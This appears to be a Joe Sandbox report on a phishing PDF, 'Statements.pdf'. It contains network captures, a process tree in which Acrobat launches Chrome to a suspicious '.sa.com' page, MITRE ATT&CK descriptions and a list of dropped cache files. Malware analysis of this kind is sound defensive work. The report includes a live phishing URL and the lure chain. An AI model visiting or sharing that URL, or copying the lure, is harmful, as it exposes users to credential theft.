2024-12-20 17:11:33 UTC	7984	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 69 6e 61 65 72 6f 2e 63 6f 6d 2f 62 6c 6f 67 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 31 36 2f 30 35 2f 62 75 69 6c 64 2d 31 30 31 35 38 2e 70 6e 67 22 3e 0d 0a 0d 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 77 69 6e 61 65 72 6f 2e 63 6f 6d 2f 62 6c 6f 67 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 31 36 2f 30 35 2f 62 75 69 6c 64 2d 31 30 31 35 38 2e 70 6e 67 22 3e 20 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 47 4b 53 41 39 4d 41 53 4b 51 56 42 41 38 30 48 4a 53 41 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 20 20 20 20 20 3c Data Ascii: <link rel="icon" href="https://winaero.com/blog/wp-content/uploads/2016/05/build-10158.png"><meta property="og:image" content="https://winaero.com/blog/wp-content/uploads/2016/05/build-10158.png"> <title>GKSA9MASKQVBA80HJSA</title> <
2024-12-20 17:11:33 UTC	8000	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-12-20 17:11:34 UTC	8000	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-12-20 17:11:34 UTC	8000	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-12-20 17:11:34 UTC	8000	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-12-20 17:11:34 UTC	8000	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-12-20 17:11:34 UTC	8000	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-12-20 17:11:34 UTC	8000	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-12-20 17:11:34 UTC	8000	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-12-20 17:11:34 UTC	8000	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49774	68.183.112.81	443	4440	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-20 17:11:37 UTC	623	OUT	GET /blog/wp-content/uploads/2016/05/build-10158.png HTTP/1.1 Host: winaero.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://desbullariamos.sa.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-20 17:11:37 UTC	338	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Dec 2024 17:11:37 GMT Content-Type: image/png Content-Length: 7584 Last-Modified: Sat, 28 May 2016 14:51:48 GMT Connection: close ETag: "5749b084-1da0" Expires: Fri, 20 Dec 2024 17:11:36 GMT Cache-Control: no-cache Strict-Transport-Security: max-age=15768000 Accept-Ranges: bytes
2024-12-20 17:11:37 UTC	7584	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 1d 52 49 44 41 54 78 da ed 5d 4b 8c 65 d7 55 dd 55 5d 76 07 75 bb 69 07 c9 4a 83 64 1c c4 c0 04 45 74 23 21 84 70 a4 b6 c5 10 c5 49 26 01 65 d2 99 10 48 06 21 83 84 64 84 23 45 4c 71 a4 48 64 96 0e 30 b7 8d 19 62 d2 0a 03 04 93 ee 78 14 31 f0 0f 85 04 45 0e ed ee fa bf 7a 6f 73 ef eb fa bc ba ef 9c b3 f7 3e bf 7b df bb 6b 49 d5 55 5d ef 5b ef de bd ce 5e eb ec bd ef 06 33 13 00 00 e3 c4 26 3e 02 00 00 01 00 00 00 02 00 00 00 04 00 00 00 08 00 00 00 10 00 00 00 20 00 00 00 40 00 00 00 80 00 00 00 00 01 00 00 00 02 00 00 00 04 00 00 00 08 00 00 00 10 00 00 00 20 00 00 00 40 00 00 00 80 00 00 Data Ascii: PNGIHDR\rfpHYs~RIDATx]KeUU]vuiJdEt#!pI&eH!d#ELqHd0bx1Ezos>{kIU][^3&> @ @

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49780	68.183.112.81	443	4440	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-20 17:11:39 UTC	382	OUT	GET /blog/wp-content/uploads/2016/05/build-10158.png HTTP/1.1 Host: winaero.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-20 17:11:39 UTC	338	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Dec 2024 17:11:39 GMT Content-Type: image/png Content-Length: 7584 Last-Modified: Sat, 28 May 2016 14:51:48 GMT Connection: close ETag: "5749b084-1da0" Expires: Fri, 20 Dec 2024 17:11:38 GMT Cache-Control: no-cache Strict-Transport-Security: max-age=15768000 Accept-Ranges: bytes
2024-12-20 17:11:39 UTC	7584	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 1d 52 49 44 41 54 78 da ed 5d 4b 8c 65 d7 55 dd 55 5d 76 07 75 bb 69 07 c9 4a 83 64 1c c4 c0 04 45 74 23 21 84 70 a4 b6 c5 10 c5 49 26 01 65 d2 99 10 48 06 21 83 84 64 84 23 45 4c 71 a4 48 64 96 0e 30 b7 8d 19 62 d2 0a 03 04 93 ee 78 14 31 f0 0f 85 04 45 0e ed ee fa bf 7a 6f 73 ef eb fa bc ba ef 9c b3 f7 3e bf 7b df bb 6b 49 d5 55 5d ef 5b ef de bd ce 5e eb ec bd ef 06 33 13 00 00 e3 c4 26 3e 02 00 00 01 00 00 00 02 00 00 00 04 00 00 00 08 00 00 00 10 00 00 00 20 00 00 00 40 00 00 00 80 00 00 00 00 01 00 00 00 02 00 00 00 04 00 00 00 08 00 00 00 10 00 00 00 20 00 00 00 40 00 00 00 80 00 00 Data Ascii: PNGIHDR\rfpHYs~RIDATx]KeUU]vuiJdEt#!pI&eH!d#ELqHd0bx1Ezos>{kIU][^3&> @ @

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Acrobat.exePID: 3560, Parent PID: 1028

General

Target ID:	0
Start time:	12:11:03
Start date:	20/12/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Statements.pdf"
Imagebase:	0x7ff686a00000
File size:	5'641'176 bytes
MD5 hash:	24EAD1C46A47022347DC0F05F6EFBB8C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: AcroCEF.exePID: 320, Parent PID: 3560

General

Target ID:	2
Start time:	12:11:03
Start date:	20/12/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Imagebase:	0x7ff6413e0000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: AcroCEF.exePID: 5476, Parent PID: 320

General

Target ID:	4
Start time:	12:11:04
Start date:	20/12/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1524,i,11376464214998597370,10738418600549799697,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Imagebase:	0x7ff6413e0000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 8132, Parent PID: 5604

General

Target ID:	8
Start time:	12:11:28
Start date:	20/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://desbullariamos.sa.com/Scanned.php"
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 4440, Parent PID: 8132

General

Target ID:	9
Start time:	12:11:29
Start date:	20/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2208,i,1564366894053851536,3153914400913891470,262144 /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
Tactics:	Initial Access
Data Sources:	Application Log: Application Log Content, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Google Workspace, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Statements.pdf

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Software Vulnerabilities

Networking

System Summary

Boot Survival

Hooking and other Techniques for Hiding and Protection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF5bbdf6.TMP (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\bbe9cbdb-e3d7-45a6-8d74-47913d56749b.tmp

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\e129a911-5eb4-4abe-8b84-39c06404a828.tmp

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241220171108Z-166.bmp

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.6760

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.6760

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheAcro65536.dat

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

Windows Analysis Report
Statements.pdf